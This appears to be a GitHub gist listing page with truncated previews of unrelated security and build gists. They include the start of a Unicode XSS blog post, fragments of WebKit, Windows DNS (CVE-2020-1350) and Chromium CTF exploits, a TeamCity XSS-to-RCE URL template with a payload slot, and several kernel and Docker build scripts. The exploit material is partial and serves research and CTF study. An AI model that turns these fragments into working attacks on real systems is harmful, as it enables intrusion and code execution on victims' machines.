@paj28
paj28 / index.md
Last active November 18, 2025 02:49

Unicode XSS via Combining Characters

Most application security practitioners are familiar with Unicode XSS, which typically arises from the Unicode character fullwidth-less-than-sign. It’s not a common vulnerability but does occasionally appear in applications that otherwise have good XSS protection. In this blog I describe another variant of Unicode XSS that I have identified, using combining characters. I’ve not observed this in the wild, so it’s primarily of theoretical concern. But the scenario is not entirely implausible and I’ve not otherwise seen this technique discussed, so I hope this is useful.

Recap of Unicode XSS

Lab: https://4t64ubva.xssy.uk/

A quick investigation of the lab shows that it is echoing the name parameter, and performing HTML escaping:

@ujin5
ujin5 / fuck.js
Last active December 27, 2025 18:15
WebKit RCE on iOS 14.1
function sleep( sleepDuration ){
    var now = new Date().getTime();
    while(new Date().getTime() < now + sleepDuration){ /* do nothing */ }
}
function gc() {
    for (let i = 0; i < 0x10; i++) {
        new ArrayBuffer(0x1000000);
    }
}
let data_view = new DataView(new ArrayBuffer(8));
#!/usr/bin/env python3
"""cve-2020-1350.py: Windows DNS Server Vulnerability"""
__author__ = "@joaovarelas"
__date__ = "July, 2020"
import binascii,socket,struct
from dnslib import *
@ujin5
ujin5 / exploit.html
Created June 29, 2020 02:20
0CTF/TCTF 2020 Quals Chromium
<script id="worker1">
worker:{
    if (typeof window === 'object') break worker;
    self.onmessage = function() {
        console.log("onmessage")
    }
}
</script>
<script src="../mojo_bindings.js"></script>
<script src="../third_party/blink/public/mojom/tstorage/tstorage.mojom.js"></script>
@ujin5
ujin5 / exploit.html
Created April 20, 2020 00:11
2020 Plaid CTF mojo
<html>
<body></body>
<script src="../mojo/public/js/mojo_bindings.js"></script>
<script src="../third_party/blink/public/mojom/plaidstore/plaidstore.mojom.js"></script>
<script src="../third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script>
var heap;
var replace_data;
var count = 0;
var blob_registry_ptr = new blink.mojom.BlobRegistryPtr();
@nhtua
nhtua / 00.install-android-sdk.sh
Last active October 13, 2025 11:44
Run a Headless Android Device on Ubuntu server (no GUI)
#!/bin/bash -i
#using shebang with -i to enable interactive mode (auto load .bashrc)
set -e #stop immediately if any error happens
# Install Open SDK
apt update
apt install openjdk-8-jdk -y
update-java-alternatives --set java-1.8.0-openjdk-amd64
java -version
@JLLeitschuh
JLLeitschuh / CVE-2019-15848.md
Last active December 29, 2019 01:30
Full POC for CVE-2019-15848

CVE-2019-15848: TeamCity XSS to Remote Code Execution

This POC demonstrates taking advantage of an XSS vulnerability in TeamCity allowing an attacker to achieve Remote Code Execution on a build agent if the victim has the ability to add steps to a CI job.

POC

The POC can be simplified to the following URL:

https://[domain.com]/project.html?projectId=[target_project_id]&tab=problems%27%7D)%3B%7D)()%3B[JS_PAYLOAD]
@jlamendo
jlamendo / Dockerfile
Created March 24, 2019 21:05
Dockerfile for googleprojectzero/fuzzilli
FROM ubuntu:18.04
RUN apt-get update \
 && apt-get install -y wget xz-utils build-essential curl git subversion make g++ python chrpath libicu-dev lsb-release \
 && apt-get clean \
 && rm -rf /var/lib/apt/lists/* \
 && curl -SL http://releases.llvm.org/7.0.1/clang+llvm-7.0.1-x86_64-linux-gnu-ubuntu-18.04.tar.xz | tar -xJC . \
 && mv clang+llvm-7.0.1-x86_64-linux-gnu-ubuntu-18.04 /usr/share/clang_7.0.1 \
 && echo 'export PATH="/usr/share/clang_7.0.1/bin:$PATH"' >> ~/.bashrc \
 && echo 'export LD_LIBRARY_PATH="/usr/share/clang_7.0.1/lib:$LD_LIBRARY_PATH"' >> ~/.bashrc \
@f0rki
f0rki / Makefile
Last active January 17, 2020 00:09
Can you LD_PRELOAD from noexec mounted directory?
all: test preload.so
clean:
	-$(RM) test preload.so
%.so: %.c
	$(CC) $^ -o $@ -shared -fPIC $(CFLAGS)
@atulprak
atulprak / wahoo_mybuild.sh
Last active July 9, 2025 07:05
Compiling Linux Kernel for Pixel 2 devices -- Bash script
#!/bin/bash
# Purpose: Script for building AOSP code and Linux kernel for walleye using open-source toolchains.
# Author: atulp@google.com
# License: Gnu GPL v. 2
# License is same as Linux kernel license, since the code helps compile the Linux kernel for a device
# Change these directory paths to point to your aosp and NDK folders.
export AOSP=~/src/aosp
export CROSS_COMPILE=~/ndk/android-ndk-r16b/toolchains/aarch64-linux-android-4.9/prebuilt/linux-x86_64/bin/aarch64-linux-android-
# Change these if you are building for something other than walleye (Pixel 2) as needed.
export KERNELNAME=wahoo